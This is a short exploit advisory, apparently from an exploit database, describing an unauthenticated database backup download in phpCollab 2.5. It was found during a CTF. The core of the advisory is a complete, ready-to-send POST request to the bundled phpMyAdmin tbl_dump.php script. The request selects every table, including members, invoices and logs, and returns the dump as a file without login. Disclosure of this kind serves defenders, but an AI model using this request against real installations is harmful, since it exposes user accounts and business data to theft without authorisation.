# Exploit Title: phpcollab Unauthenticated Database Backup Download # Date: 3/5/2012 # Author: team ' and 1=1-- # Software Link: http://www.phpcollab.com/ # Version: 2.5 # Vulnerability was found during the AthCon IT Security Conference CTF #CTF organizer: echothrust During AthCon CTF the team ' and 1=1-- identified that a potential attacker is able to download the database backup of the phpcollab instance that is installed under the following URL: http://xxx.xxx.xxx.xxx/phpcollab/ The Vulnerability can be exploited by sending the following POST Request: http://xxx.xxx.xxx.xxx/phpcollab/includes/phpmyadmin/tbl_dump.php POST DATA: table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B %5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B %5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select% 5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_ requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B% 5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server= 1&lang=en&db=phpcollab